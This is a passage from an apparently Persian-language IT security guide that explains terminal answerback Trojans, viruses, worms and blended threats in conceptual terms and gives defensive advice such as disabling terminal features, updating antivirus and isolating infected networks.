‫ﺷﻜﻞ ﺩﻳﮕﺮﻱ ﺍﺯ ﺍﺳﺒﻬﺎﻱ ﺗﺮﺍﻭﺍ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﺑﻬﺮﻩﮔﻴﺮﻱ ﺍﺯ ﺩﺳﺘﻮﺭ ﺍﺭﺳﺎﻝ ﺑﻠﻮﻛﻲ‪ ٣٢٧‬ﻳﺎ ﺣﺎﻻﺕ ﺑـﺎﺯﮔﻮ‪ ٣٢٨‬ﺩﺭ ﭘﺎﻳﺎﻧـﻪﻫـﺎﻱ ﺳـﺮﻳﺎﻝ ﻣﺤـﺼﻮﻝ‬
‫ﺩﻫﻪﻫﺎﻱ ‪ ١٩٧٠‬ﻭ ‪) ١٩٨٠‬ﻛﻪ ﺗﻮﺳﻂ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺷﺒﻴﻪﺳﺎﺯ ﭘﺎﻳﺎﻧﻪ ﺍﺯ ﺟﻤﻠﻪ ‪ HyperTerminal‬ﻣﺤﺼﻮﻝ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺷﺒﻴﻪﺳﺎﺯﻱ ﺷـﺪﻩﺍﻧـﺪ( ﻛـﺎﺭ‬
‫ﻛﻨﻨﺪ‪ .‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﮔﻮﻧﻪﻫﺎﻱ ﭘﺎﻳﺎﻧﻪﻫﺎ ﺗﻨﻈﻴﻤﺎﺗﻲ ﺩﺍﺭﻧﺪ ﻛﻪ ﻃﺒﻖ ﺁﻧﻬﺎ ﻳﻚ ﺭﺷﺘﻪ ﻛﺎﺭﺍﻛﺘﺮﻫﺎﻱ ﺧﺎﺹ ﻛﻨﺘﺮﻟﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎﻋﺚ ﺷـﻮﺩ ﻛـﻪ ﻳـﻚ‬
‫ﺩﺳﺘﻮﺭ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﺁﻳﺪ؛ ﺁﻧﭽﻨﺎﻥ ﻛﻪ ﮔﻮﻳﻲ ﺁﻥ ﺩﺳﺘﻮﺭ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺻﻔﺤﻪﻛﻠﻴﺪ ﻭﺍﺭﺩ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﻳﻚ ﺩﺳـﺘﻮﺭ ﻛـﻪ ﺩﺭﻭﻥ‬
‫ﻳﻚ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻗﺮﺍﺭ ﺩﺍﺭﺩ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺎﻋﺚ ﺷﻮﺩ ﭘﺎﻳﺎﻧﻪ ﻳﻚ ﻓﺮﻣﺎﻥ ﻣﺒﻨﻲ ﺑﺮ "ﭘﺎﻙ ﻛﺮﺩﻥ ﻫﻤـﺔ ﻓﺎﻳﻠﻬـﺎ ﻭ ﺧـﺮﻭﺝ ﺍﺯ ﺳﻴـﺴﺘﻢ" ﺑـﻪ‬
‫ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺑﻔﺮﺳﺘﺪ‪ ،‬ﻭ ﺳﭙﺲ ﻳﻚ ﺭﺷﺘﻪ ﺑﺮﺍﻱ "ﭘﺎﻙ ﻛﺮﺩﻥ ﺻﻔﺤﻪ" ﻧﻴﺰ ﺑﺮﺍﻱ ﺧﻮﺩ ﭘﺎﻳﺎﻧﻪ ﺍﺭﺳﺎﻝ ﻛﻨﺪ‪ .‬ﺍﻳﻦ ﻭﻳﮋﮔﻲ ﺭﺍ ﺩﺭ ﭘﺎﻳﺎﻧﻪ ﻳﺎ ﺑﺮﻧﺎﻣـﺔ‬
‫ﺷﺒﻴﻪﺳﺎﺯ ﺧﻮﺩ ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴﺪ‪.‬‬

‫ﻭﻳﺮﻭﺳﻬﺎ‬
‫ﻳﻚ ﻭﻳﺮﻭﺱ ﻭﺍﻗﻌﻲ ﺑﺮﻧﺎﻣﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺑﻪ ﺳﺎﻳﺮ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺍﺟﺮﺍﻳﻲ ﺍﺿﺎﻓﻪ ﻣﻲﺷﻮﺩ‪ .‬ﺩﺭﻧﺘﻴﺠﻪ ﻫﺮﮔـﺎﻩ ﺑﺮﻧﺎﻣـﺔ ﻋـﺎﺩﻱ ﺍﺟـﺮﺍ ﺷـﻮﺩ‪ ،‬ﺑﺮﻧﺎﻣـﺔ‬
‫ﻭﻳﺮﻭﺱ ﻧﻴﺰ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﻣﻲﺁﻳﺪ‪ .‬ﺑﺮﻧﺎﻣﺔ ﻭﻳﺮﻭﺱ ﺑﺎﻋﺚ ﺍﺿﺎﻓﻪ ﺷﺪﻥ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﺧﻮﺩﺵ ﺩﺭ ﻳﻚ ﻳﺎ ﭼﻨﺪ ﺑﺮﻧﺎﻣﺔ ﺩﻳﮕﺮ ﻣﻲﮔﺮﺩﺩ‪ .‬ﻭﻳﺮﻭﺳـﻬﺎ‬
‫ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﺴﺘﻘﻠﻲ ﺑﺎﺷﻨﺪ ‪ -‬ﻳﻌﻨﻲ ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﺗﻨﻬﺎﻳﻲ ﺍﺟﺮﺍ ﺷﻮﻧﺪ‪ ،‬ﺑﻠﻜﻪ ﺑﺮﺍﻱ ﺍﺟﺮﺍ ﻧﻴﺎﺯ ﺑـﻪ ﻳـﻚ ﻣﻴﺰﺑـﺎﻥ ﺩﺍﺭﻧـﺪ ﺗـﺎ ﺑﻌﻨـﻮﺍﻥ‬
‫ﺑﺨﺸﻲ ﺍﺯ ﺁﻥ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﺁﻳﻨﺪ‪.‬‬
‫ﺗﻘﺮﻳﺒﹰﺎ ﺗﻤﺎﻡ ﻭﻳﺮﻭﺳﻬﺎ‪ ،‬ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﺩﺍﺭﺍﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﭘﺮﻛﺎﺭﺑﺮﺩ )ﻣﺎﻧﻨـﺪ ‪ Microsoft Windows ،MS DOS‬ﻭ ‪ (Apple MacOS‬ﺭﺍ‬
‫ﻫﺪﻑ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻨﺪ‪ .‬ﻭﻳﺮﻭﺳﻬﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺩﺭ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻳﻲ ﻛﻪ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻛﻤﻲ ﺩﺍﺭﻧﺪ )ﻣﺎﻧﻨﺪ ‪ DOS‬ﻭ ‪ MacOS‬ﻧﺴﺨﻪﻫﺎﻱ ﻗﺒـﻞ ﺍﺯ‬
‫ﻭﻳﺮﺍﻳﺶ ‪ (١٠‬ﻭ ﻫﻤﭽﻨﻴﻦ ﺁﻧﻬﺎﻳﻲ ﻛﻪ ﺍﺯ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﭘﻴﺸﺮﻓﺘﻪﺍﻱ ﺑﺮﺧﻮﺭﺩﺍﺭﻧـﺪ )ﻣﺜـﻞ ‪ Windows NT‬ﻭ ‪ (Windows XP‬ﺍﻧﺘـﺸﺎﺭ ﻳﺎﺑﻨـﺪ‪.‬‬
‫ﺑﺮﺍﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ Unix‬ﻫﻢ ﻭﻳﺮﻭﺳﻬﺎﻳﻲ ﻧﻮﺷﺘﻪ ﺷـﺪﻩ ﺍﺳـﺖ‪ .‬ﺣﺘـﻲ ﻭﻳﺮﻭﺳـﻬﺎﻳﻲ ﻧﻮﺷـﺘﻪ ﺷـﺪﻩﺍﻧـﺪ ﻛـﻪ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﻫـﻢ ﺳﻴـﺴﺘﻤﻬﺎﻱ‬
‫‪ Windows‬ﻭ ﻫﻢ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ‪ Unix‬ﺭﺍ ﺁﻟﻮﺩﻩ ﺳﺎﺯﻧﺪ‪ .‬ﻭﻳﺮﻭﺳﻬﺎﻳﻲ ﻛﻪ ‪ boot sector‬ﺭﺍ ﺁﻟﻮﺩﻩ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺑﺘﻮﺍﻧﻨـﺪ‬
‫ﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ Windows‬ﺁﻟـﻮﺩﻩ‬ ‫ﻳﻚ ﺩﻳﺴﻜﺖ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﺭﺍ ﺁﻟﻮﺩﻩ ﻛﻨﻨﺪ‪ ،‬ﻣﻲﺗﻮﺍﻧﻨﺪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ‪ BSD‬ﻳﺎ ‪ Linux‬ﺭﺍ ﻧﻴﺰ ﺑﺮﺍﺣﺘ ﹺ‬
‫ﻧﻤﺎﻳﻨﺪ )ﻫﺮﭼﻨﺪ ﺍﻳﻦ ﺁﻟﻮﺩﮔﻲ ﻧﻤﻲﺗﻮﺍﻧﺪ ﺑﻴﺶ ﺍﺯ ﺁﻥ ﮔﺴﺘﺮﺵ ﻳﺎﺑﺪ(‪.‬‬

‫‪327 Block-Send Command‬‬


‫‪328 Answerback Modes‬‬
‫‪٤٢١‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﻭﻳﺮﻭﺳﻬﺎ ﺍﺑﺰﺍﺭ ﻗﺪﺭﺗﻤﻨﺪﻱ ﺑﺮﺍﻱ ﻣﻬﺎﺟﻤﺎﻥ ﻫﺴﺘﻨﺪ‪ .‬ﻫﺮﭼﻨﺪ ﻫﺮ ﻛﺎﺭﻱ ﻛﻪ ﺗﻮﺳﻂ ﻭﻳﺮﻭﺱ ﺍﻧﺠﺎﻡ ﻣﻲﺷﻮﺩ ﺍﺯ ﺭﺍﻫﻬﺎﻱ ﺩﻳﮕﺮ ﻧﻴﺰ ﻗﺎﺑـﻞ ﺍﻧﺠـﺎﻡ‬
‫ﺍﺳﺖ‪ ،‬ﻭﻟﻲ ﻭﻳﺮﻭﺳﻬﺎ ﻗﺎﺩﺭﻧﺪ ﺑﺪﻭﻥ ﺩﺧﺎﻟﺖ ﻳﺎ ﻫﺪﺍﻳﺖ ﻣﻬﺎﺟﻢ ﮔﺴﺘﺮﺵ ﻳﺎﺑﻨﺪ ﻭ ﺣﺘﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﻣﻨﺎﻃﻘﻲ ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻛﻨﻨﺪ ﻛـﻪ ﻣﻬـﺎﺟﻢ‬
‫ﺷﺨﺼﹰﺎ ﻧﻤﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺁﻧﻬﺎ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪.‬‬

‫ﺑﺮﺍﻱ ﻣﺤﺎﻓﻈﺖ ﺩﺭ ﺑﺮﺍﺑﺮ ﻭﻳﺮﻭﺳﻬﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﻫﻤـﺎﻥ ﻓﻨـﻮﻥ ﻣﻘﺎﺑﻠـﻪ ﺑـﺎ ﺩﺭﺑﻬـﺎﻱ ﻣﺨﻔـﻲ ﻭ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﺭﻣﺰﺷـﻜﻦ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨﻴـﺪ‪ .‬ﺩﺭ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ Intel‬ﻧﺒﺎﻳﺪ ﺳﻴﺴﺘﻢ ﺭﺍ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺩﻳﺴﻜﻬﺎﻱ ﻏﻴﺮ ﻗﺎﺑﻞ ﺍﻋﺘﻤﺎﺩ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻧﻤﺎﻳﻴﺪ‪ .‬ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﻧﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﺿـﺪﻭﻳﺮﻭﺱ‬
‫ﻳﻚ ﻧﻴﺎﺯ ﺍﺳﺎﺳﻲ ﺑﺮﺍﻱ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺧﺎﻧﮕﻲ ﻭ ﺷﺮﻛﺘﻬﺎ ﻣﺤﺴﻮﺏ ﻣﻲﺷﻮﻧﺪ‪ ،‬ﺍﻣﺎ ﺑﺎ ﺍﻳﻦ ﻭﺟﻮﺩ ﺗﻌـﺪﺍﺩ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﻓﺎﻗـﺪ ﺿـﺪﻭﻳﺮﻭﺱ ﺑـﻴﺶ ﺍﺯ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻣﺠﻬﺰ ﺑﻪ ﺁﻥ ﺍﺳﺖ‪ .‬ﻣﺴﺌﻠﻪ ﺩﻳﮕﺮﻱ ﻛﻪ ﺑﻪ ﻫﻤﻴﻦ ﺍﻧﺪﺍﺯﻩ ﻧﮕﺮﺍﻥﻛﻨﻨﺪﻩ ﻣﻲﺑﺎﺷﺪ ﺍﻳﻦ ﺍﺳﺖ ﻛـﻪ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﻛـﺴﺎﻧﻴﻜﻪ ﻧـﺮﻡﺍﻓـﺰﺍﺭ‬
‫ﻼ ﻛـﺎﺭﺍﻳﻲ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ﺧـﻮﺩ ﺭﺍ ﺩﺭ ﻣﻘﺎﺑـﻞ‬
‫ﺿﺪﻭﻳﺮﻭﺱ ﺗﻬﻴﻪ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﻧﺸﺎﻧﻬﺎﻱ ﻭﻳﺮﻭﺱ ﺁﻧﺮﺍ ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻧﻤﻲﻧﻤﺎﻳﻨﺪ‪ ،‬ﻭ ﻋﻤـ ﹰ‬
‫ﺗﻬﺪﻳﺪﺍﺕ ﺟﺪﻳﺪ ﺑﻪ ﺣﺪﺍﻗﻞ ﻣﻲﺭﺳﺎﻧﻨﺪ‪.‬‬

‫ﻛﺮﻣﻬﺎ‬
‫ﻛﺮﻣﻬﺎ ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻄﻮﺭ ﻣﺴﺘﻘﻞ ﺍﺟﺮﺍ ﺷﻮﻧﺪ ﻭ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﺗﺼﺎﻻﺕ ﺷﺒﻜﻪ ﺍﺯ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﺑﻪ ﻳﻚ ﺭﺍﻳﺎﻧﺔ ﺩﻳﮕﺮ ﻣﻨﺘﻘﻞ‬
‫ﺷﻮﻧﺪ؛ ﻳﺎ ﺣﺘﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﻗﺴﻤﺘﻬﺎﻱ ﻣﺨﺘﻠﻒ ﻳﻚ ﻛﺮﻡ ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻣﺘﻔﺎﻭﺗﻲ ﺍﺟﺮﺍ ﺷﻮﻧﺪ‪ .‬ﻛﺮﻣﻬﺎ ﺳﺎﻳﺮ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺭﺍ ﺗﻐﻴﻴﺮ ﻧﻤـﻲﺩﻫﻨـﺪ‪،‬‬
‫ﻫﺮﭼﻨﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺣﺎﻭﻱ ﺑﺮﻧﺎﻣﻪﺍﻱ ﺑﺎﺷﻨﺪ ﻛﻪ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﻫﺪ )ﻣﺜﻞ ﻳﻚ ﻭﻳﺮﻭﺱ(‪ .‬ﺻـﺪﻫﺎ ﻛـﺮﻡ ﺷـﺒﻜﻪﺍﻱ ﺑـﺮﺍﻱ ﺳﻴـﺴﺘﻢﻋﺎﻣﻠﻬـﺎﻱ‬
‫ﻻ ﺁﺩﺭﺳﻬﺎﻱ‬ ‫ﻣﺨﺘﻠﻒ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩﺍﻧﺪ‪ .‬ﺷﺎﻳﺪ ﺑﺘﻮﺍﻥ ﮔﻔﺖ ﻛﻪ ﺷﺎﻳﻌﺘﺮﻳﻦ ﻛﺮﻣﻬﺎ ﺍﺯ ﻃﺮﻳﻖ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﻨﺘﺸﺮ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺍﻳﻦ ﻛﺮﻣﻬﺎ ﻣﻌﻤﻮ ﹰ‬
‫ﭘﺴﺘﻲ ﺩﻳﮕﺮﺍﻥ ﺭﺍ ﺍﺯ ﺩﻓﺘﺮﭼﺔ ﺁﺩﺭﺳﻬﺎﻱ ﺳﻴﺴﺘﻢ ﺁﻟﻮﺩﻩ ﺑﺪﺳﺖ ﻣﻲﺁﻭﺭﻧﺪ ﻭ ﺧﻮﺩ ﺭﺍ ﺑﻌﻨﻮﺍﻥ ﭘﻴﺎﻡ ﻣﻬﻤﻲ ﺍﺯ ﻃﺮﻑ ﺻﺎﺣﺐ ﺳﻴﺴﺘﻢ ﺁﻟﻮﺩﻩ )ﻳﺎ ﺣﺘﻲ‬
‫ﺍﺯ ﻃﺮﻑ ﺳﺎﻳﺮ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﻧﺎﻣﺸﺎﻥ ﺩﺭ ﺩﻓﺘﺮﭼﺔ ﺁﺩﺭﺳﻬﺎﻱ ﺻﺎﺣﺐ ﺳﻴﺴﺘﻢ ﺁﻟﻮﺩﻩ ﻭﺟﻮﺩ ﺩﺍﺭﺩ( ﺑﻪ ﺁﻧﻬﺎ ﻣﻲﻓﺮﺳﺘﻨﺪ‪.‬‬
‫ﻣﺤﺎﻓﻈﺖ ﺩﺭ ﺑﺮﺍﺑﺮ ﻛﺮﻣﻬﺎ ﻣﺴﺘﻠﺰﻡ ﻫﻤﺎﻥ ﻓﻨﻮﻥ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﻧﻔﻮﺫ ﺍﺳﺖ‪ .‬ﺍﮔﺮ ﻣﻬﺎﺟﻢ ﺑﺘﻮﺍﻧﺪ ﺑﻪ ﻣﺎﺷﻴﻦ ﺷﻤﺎ ﻭﺍﺭﺩ ﺷﻮﺩ‪ ،‬ﻳﻚ ﻛﺮﻡ ﻫﻢ ﻣﻲﺗﻮﺍﻧـﺪ‪.‬‬
‫ﺍﮔﺮ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺩﺭ ﺑﺮﺍﺑﺮ ﺩﺳﺘﺮﺳﻲ ﻏﻴﺮﻣﺠﺎﺯ ﺍﻳﻤﻦ ﺑﺎﺷﺪ‪ ،‬ﻃﺒﻴﻌﺘﹰﺎ ﺩﺭ ﺑﺮﺍﺑﺮ ﻛﺮﻣﻬﺎ ﻧﻴﺰ ﺍﻣﻨﻴﺖ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ‪ .‬ﺗﻤﺎﻡ ﺗﻮﺻﻴﻪﻫـﺎﻳﻲ ﻛـﻪ ﺩﺭ ﻣـﻮﺭﺩ‬
‫ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺩﺳﺘﺮﺳﻲ ﻏﻴﺮﻣﺠﺎﺯ ﺍﺭﺍﺋﻪ ﺷﺪ ﺍﻳﻨﺠﺎ ﻧﻴﺰ ﻗﺎﺑﻞ ﺍﻋﻤﺎﻝ ﻫﺴﺘﻨﺪ‪.‬‬
‫ﺍﮔﺮ ﺗﺮﺩﻳﺪ ﺩﺍﺷﺘﻴﺪ ﻛﻪ ﺗﻮﺳﻂ ﻳﻚ ﻛﺮﻡ ﺷﺒﻜﻪﺍﻱ ﻣﻮﺭﺩ ﺣﻤﻠﻪ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪﺍﻳﺪ‪ ،‬ﺑﺎ ﻣﺮﺍﻛﺰ ﻭﺍﻛﻨﺶ ﺑﻪ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ‪ ٣٢٩‬ﺗﻤﺎﺱ ﺑﮕﻴﺮﻳـﺪ ﻭ‬
‫ﺑﺒﻴﻨﻴﺪ ﺁﻳﺎ ﺩﻳﮕﺮﺍﻥ ﻧﻴﺰ ﮔﺰﺍﺭﺷﺎﺕ ﻣﺸﺎﺑﻬﻲ ﺩﺍﺩﻩﺍﻧﺪ ﻳﺎ ﺧﻴﺮ‪ .‬ﺩﺭﺻﻮﺭﺕ ﻭﻗﻮﻉ ﺣﺎﺩﺛﻪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺍﻳﻦ ﻃﺮﻳﻖ ﺍﻃﻼﻋﺎﺕ ﻣﻔﻴﺪﻱ ﺑﺮﺍﻱ ﻣﺤﺎﻓﻈﺖ‬
‫ﻳﺎ ﺑﺎﺯﻳﺎﺑﻲ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺑﺪﺳﺖ ﺁﻭﺭﻳﺪ‪ .‬ﺍﺗﺼﺎﻝ ﺍﻳﻨﺘﺮﻧﺖ ﺷﺒﻜﺔ ﺧﻮﺩ ﺭﺍ ﻗﻄﻊ ﻛﻨﻴﺪ ﺗﺎ ﺷﺒﻜﺔ ﻣﺤﻠﻲ ﺷﻤﺎ ﺍﻳﺰﻭﻟﻪ ﺷـﻮﺩ‪ .‬ﺍﮔـﺮ ﻭﺍﻗﻌـﹰﺎ ﻛﺮﻣـﻲ ﺑـﻪ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷﻤﺎ ﺭﺧﻨﻪ ﻛﺮﺩﻩ ﺑﺎﺷﺪ‪ ،‬ﺑﺎ ﺍﻳﻨﻜﺎﺭ ﺩﺭ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﮔﺴﺘﺮﺵ ﺁﻥ ﻛﻤﻚ ﻛﺮﺩﻩﺍﻳﺪ ﻭ ﻫﻤﭽﻨﻴﻦ ﺟﻠﻮﻱ ﺍﺭﺳﺎﻝ ﺍﻃﻼﻋـﺎﺕ ﻣﻬـﻢ ﺑـﻪ‬
‫ﺧﺎﺭﺝ ﺍﺯ ﺷﺒﻜﺔ ﻣﺤﻠﻲ ﺧﻮﺩ ﺭﺍ ﮔﺮﻓﺘﻪﺍﻳﺪ‪ .‬ﺍﮔﺮ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﻭ ﺳﺎﻳﺮ ﺗﺪﺍﺑﻴﺮ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺑﺨﻮﺑﻲ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻛﺮﺩﻩ ﺑﺎﺷﻴﺪ‪ ،‬ﺧﺴﺎﺭﺗﻬﺎﻱ ﻭﺍﺭﺩﻩ ﺑـﻪ‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﺷﻤﺎ ﺑﺎﻳﺪ ﻧﺎﭼﻴﺰ ﺑﺎﺷﺪ‪.‬‬

‫ﺗﻬﺪﻳﺪﺍﺕ ﭼﻨﺪﻭﺟﻬﻲ‬
‫ﺑﻴﺸﺘﺮ ﺗﻬﺪﻳﺪﻫﺎﻱ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱﺷﺪﺓ ﺟﺪﻳﺪ ﻭ ﺧﻄﺮﻧﺎﻛﺘﺮﻳﻦ ﺁﻧﻬﺎ "ﺗﻬﺪﻳﺪﺍﺕ ﭼﻨﺪﻭﺟﻬﻲ" ﻫﺴﺘﻨﺪ‪ .‬ﻳﻚ ﺗﻬﺪﻳﺪ ﭼﻨﺪﻭﺟﻬﻲ‪ ،‬ﺣﻤﻠـﻪﺍﻱ ﺑﺮﻧﺎﻣـﻪﺍﻱ‬
‫ﺍﺳﺖ ﻛﻪ ﻭﻳﮋﮔﻴﻬﺎﻱ ﭼﻨﺪ ﻧﻮﻉ ﻣﺨﺘﻠﻒ ﺣﻤﻠﻪ ﺭﺍ ﺗﺮﻛﻴﺐ ﻣﻲﻛﻨﺪ ﻭ ﺍﺯ ﻃﺮﻕ ﻣﺨﺘﻠﻔﻲ ﻣﻨﺘﺸﺮ ﻣﻲﺷﻮﺩ‪ .‬ﻳﻚ ﺗﻬﺪﻳﺪ ﭼﻨﺪﻭﺟﻬﻲ ﻣﻲﺗﻮﺍﻧـﺪ ﻳـﻚ‬
‫ﻛﺮﻡ ﺷﺒﻜﻪﺍﻱ ﺑﺎﺷﺪ ﻛﻪ ﺍﺯ ﻃﺮﻳﻖ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺎ ﻓﺮﺳﺘﺎﺩﻥ ﻧﺴﺨﻪﻫﺎﻳﻲ ﺍﺯ ﺧﻮﺩﺵ ﺑﻪ ﺁﺩﺭﺳﻬﺎﻱ ﻣﻮﺟﻮﺩ ﺩﺭ ﺩﻓﺘﺮﭼﺔ ﺁﺩﺭﺳـﻬﺎﻱ ﺭﺍﻳﺎﻧـﺔ‬
‫ﺁﻟﻮﺩﻩ‪ ،‬ﻭ ﻳﺎ ﺍﺯ ﻃﺮﻳﻖ ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻞ ﺑﺎ ﺳﺎﻳﺮ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺘﺼﻞ ﻣﻨﺘﺸﺮ ﻣﻲﺷﻮﺩ‪ .‬ﭘﺲ ﺍﺯ ﺁﻟـﻮﺩﻥ ﺳﻴـﺴﺘﻢ‪ ،‬ﻳـﻚ ﺩﺭﺏ ﻣﺨﻔـﻲ ﺑـﺮﺍﻱ ﻭﺭﻭﺩ‬
‫ﻣﺠﺪﺩ ﺑﻪ ﺁﻥ‪ ،‬ﻳﻚ ‪ zombie‬ﺑﺮﺍﻱ ﺁﻏﺎﺯ ﻳﻚ ﺣﻤﻠﺔ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ﺗﻮﺯﻳﻊﺷﺪﻩ ﺩﺭ ﺁﻳﻨﺪﻩ‪ ،‬ﻭ ﻧﻴﺰ ﻳﻚ ﺑﻤـﺐ ﻣﻨﻄﻘـﻲ ﺑـﺮﺍﻱ ﺍﻧﺠـﺎﻡ ﻳـﻚ‬
‫ﺗﺨﺮﻳﺐ ﺯﻣﺎﻧﺒﻨﺪﻱﺷﺪﻩ ﺍﻳﺠﺎﺩ ﻣﻲﻛﻨﺪ‪ .‬ﺩﻓﺎﻉ ﺩﺭ ﺑﺮﺍﺑﺮ ﺗﻬﺪﻳﺪﺍﺕ ﭼﻨﺪﻭﺟﻬﻲ ﻣﺸﺎﺑﻪ ﺩﻓﺎﻉ ﺩﺭ ﺑﺮﺍﺑﺮ ﺗﻬﺪﻳﺪﺍﺕ ﺗﻚﻭﺟﻬﻲ ﺍﺳﺖ‪ ،‬ﺑﺎ ﺍﻳـﻦ ﺗﻔـﺎﻭﺕ‬
‫ﻛﻪ ﺑﺎﻳﺪ ﺗﻤﺎﻡ ﺟﻬﺎﺕ ﺭﺍ ﺑﺎ ﻫﻢ ﺩﺭ ﻧﻈﺮ ﮔﺮﻓﺖ‪ :‬ﺑﻬﺘﺮﻳﻦ ﺭﺍﻩ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺳﻴﺴﺘﻢ ﺩﻓﺎﻋﻲ ﭼﻨﺪﻻﻳﻪ ﺍﺳﺖ‪.‬‬

‫‪329 Computer Incident Response Centers‬‬


‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٤٢٢‬‬

‫ﻣﻬﻨﺪﺳﻲ ﺍﺟﺘﻤﺎﻋﻲ‬
